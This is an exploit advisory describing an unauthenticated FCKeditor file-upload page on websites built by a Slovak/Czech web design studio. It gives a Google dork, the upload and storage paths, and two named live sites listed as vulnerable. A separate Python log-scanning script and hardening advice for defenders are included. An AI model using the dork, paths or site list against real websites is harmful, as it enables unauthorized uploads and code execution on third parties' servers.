KingSkrupellos

Schwabe Slovakia WebDesign Studio Nandu Insert File

May 21st, 2019
####################################################################

# Exploit Title : Schwabe Slovakia WebDesign Studio Nandu Unauthorized File Insertion
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21/05/2019
# Vendor Homepage : nandu.cz
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Copyright © 2012 Schwabe Slovakia s.r.o., webdesign studio nandu
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description About Software :
*****************************
Schwabe Slovakia Studio Nandu is a web design company in the Czech Republic (vendor homepage: nandu.cz).

####################################################################

# Impact :
***********
Sites built by Schwabe Slovakia Studio Nandu are prone to a vulnerability that lets
attackers upload arbitrary files: the FCKeditor file-manager upload test page is
reachable without authorization, and the upload does not adequately validate
user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the web server process. This may facilitate unauthorized access
or privilege escalation; other attacks are also possible.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

Directory File Path (where uploaded files are written) :
*******************
/_data_editor/[YOURFILENAME].txt (also .jpg, .gif, .png)

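For defenders, the two paths the advisory names (the FCKeditor connector test page and the /_data_editor/ upload directory) are enough to build a detection over web server access logs: any request to the connector directory is suspicious, and a server-side script being served from the upload directory is a strong sign that an upload has already happened. The script below is an added example and not part of the original advisory; the log lines, the IP addresses, the connector upload URL (php/upload.php?Command=FileUpload) and the file names in them are constructed for illustration, and the Apache/nginx "combined" log format is an assumption about the target's logging.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Paths taken from the advisory: the FCKeditor file-manager connector directory
# and the directory into which uploaded files are written.
CONNECTOR_PATH = "/fckeditor/editor/filemanager/connectors/"
UPLOAD_DIR = "/_data_editor/"
# Extensions the advisory lists for the upload; any other file type served from
# the upload directory (e.g. a .php script) is treated as high severity.
EXPECTED_UPLOAD_EXT = {"txt", "jpg", "gif", "png"}

# Apache/nginx "combined" log format (assumption about the server's logging).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


@dataclass
class Finding:
    ip: str
    ts: str
    method: str
    path: str
    status: int
    severity: str
    reason: str


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format access log line; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    return d


def file_extension(path: str) -> str:
    """Extension of the requested file, ignoring the query string ('' if none)."""
    basename = path.split("?", 1)[0].rsplit("/", 1)[-1]
    return basename.rsplit(".", 1)[-1].lower() if "." in basename else ""


def classify(method: str, path: str, status: int):
    """Return (severity, reason) for a request, or None if it is unremarkable."""
    lower = path.lower()
    if CONNECTOR_PATH in lower:
        if status < 400:
            return "high", "FCKeditor file-manager connector reachable"
        return "low", "probe for FCKeditor connector (not served)"
    if UPLOAD_DIR in lower and status == 200:
        if file_extension(lower) not in EXPECTED_UPLOAD_EXT:
            return "high", "non-media file served from upload directory"
    return None


def scan(lines: List[str]) -> List[Finding]:
    """Run the classifier over raw log lines and collect findings in log order."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = classify(rec["method"], rec["path"], rec["status"])
        if verdict:
            findings.append(Finding(rec["ip"], rec["ts"], rec["method"],
                                    rec["path"], rec["status"], *verdict))
    return findings


# Constructed sample log: one client reaches the test page, uploads through the
# connector and then fetches the script it dropped; another client only probes.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/May/2019:10:01:02 +0000] "GET /admin/fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 2311 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/May/2019:10:01:30 +0000] "POST /admin/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File&Command=FileUpload HTTP/1.1" 200 415 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/May/2019:10:02:01 +0000] "GET /_data_editor/file/test.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [21/May/2019:10:05:10 +0000] "GET /_data_editor/image/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [21/May/2019:10:05:11 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [21/May/2019:11:00:00 +0000] "GET /admin/fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 404 210 "-" "curl/7.64"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity:>4}] {f.ts} {f.ip} {f.method} {f.path} -> {f.status}: {f.reason}")
```

On the sample, the script reports the three requests from the first client as high severity and the 404 probe from the last client as low; the normal image fetch and the front page produce nothing. The matching hardening is the obvious one: remove uploadtest.html and the connector scripts (or put the whole /admin/fckeditor/ tree behind the site's authentication), and configure the web server so that nothing under /_data_editor/ is executed as a script.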
####################################################################

# Example Vulnerable Sites :
************************
[+] sinupret.sk/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] kaloba.sk/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################